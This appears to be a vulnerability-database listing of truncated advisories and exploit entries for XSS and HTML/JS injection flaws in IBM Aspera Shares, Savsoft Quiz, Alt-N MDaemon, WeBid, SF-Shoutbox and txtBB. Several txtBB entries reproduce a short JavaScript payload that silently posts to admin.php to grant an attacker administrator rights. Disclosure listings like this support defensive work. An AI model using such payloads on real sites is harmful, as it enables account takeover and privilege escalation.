EUVD-2023-32309

Malicious code in bioql PyPI...

Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS

Summary DOM XSS on IBM Aspera Shares 1.9.14 Patch Level 1 and earlier could lead to HTML/JS injection and Account takeover. Vulnerability Details CVEID: CVE-2020-4731 DESCRIPTION: IBM Aspera Web Application is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary...

Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting

Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting Date: 2021-05-04 Exploit Author: strider Software Link: https://github.com/savsofts/savsoftquizv5 Vendor: https://savsoftquiz.com Version: 5.0 Tested on: Ubuntu 20.04 LTS / Kali Linux...

Savsoft Quiz 5 - (User Account Settings) Persistent Cross-Site Scripting Vulnerability

Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting Exploit Author: strider Software Link: https://github.com/savsofts/savsoftquizv5 Vendor: https://savsoftquiz.com Version: 5.0 Tested on: Ubuntu 20.04 LTS / Kali Linux...

Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability

No description provided by source. ============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/...

Alt-N MDaemon Email Body HTML/JS Injection Vulnerability

============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: HTML/JS Injection Remot...

Alt-N MDaemon 12.5.613.0.3 - Email Body HTMLJS Injection

Alt-N MDaemon 12.5.613.0.3 - Email Body HTMLJS Injection ============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor...

Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection

============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: HTML/JS Injection Remot...

Alt-N MDaemon Email Body Cross Site Scripting

============================================================== Alt-N MDaemon Email Body HTML/JS Injection Vulnerability ============================================================== Software: Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: HTML/JS Injection Remot...

WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)

WeBid 1.0.2 - Persistent Cross-Site Scripting via SQL Injection Exploit Title: presistent XSS through SQLi WeBid 1.0.2 Google Dork: "powered by WeBid" Date: 15-06-2011 Author: Saif El-Sherei Software Link: http://sourceforge.net/projects/simpleauction/ Version: 1.0.2 Tested on: Firefox 4, XAMPP...

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

No description provided by source. !-- txtBB = 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ; Exploitation: 1. Create an account 2. Go to http://host/txtbb10RC3path/index.php?type=account 3. Put exploit code...

txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit

Exploit for unknown platform in category web applications ================================================================= txtBB var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type',...

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges

txtBB 1.0 RC3 - HTMLJS Injection Arbitrary Add Admin Privileges var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded';...

txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges

var req = new XMLHttpRequest; req.open'POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false; req.setRequestHeader'Content-Type', 'application/x-www-form-urlencoded'; req.send'signature=&avatar=&type=3&password=&submit=Zapisz'; milw0rm.com 2009-02-05...

[Full-disclosure] SF-Shoutbox 1.2.1 &lt;= 1.4 HTML/JS Injection Vulnerability

----------------------------- || WWW.SMASH-THE-STACK.NET || ----------------------------- || ADVISORY: SF-Shoutbox 1.2.1 = 1.4 HTML/JS Injection Vulnerability || 0x00: ABOUT ME || 0x01: DATELINE || 0x02: INFORMATION || 0x03: EXPLOITATION || 0x04: GOOGLE DORK || 0x05: RISK LEVEL || 0x00: ABOUT ME...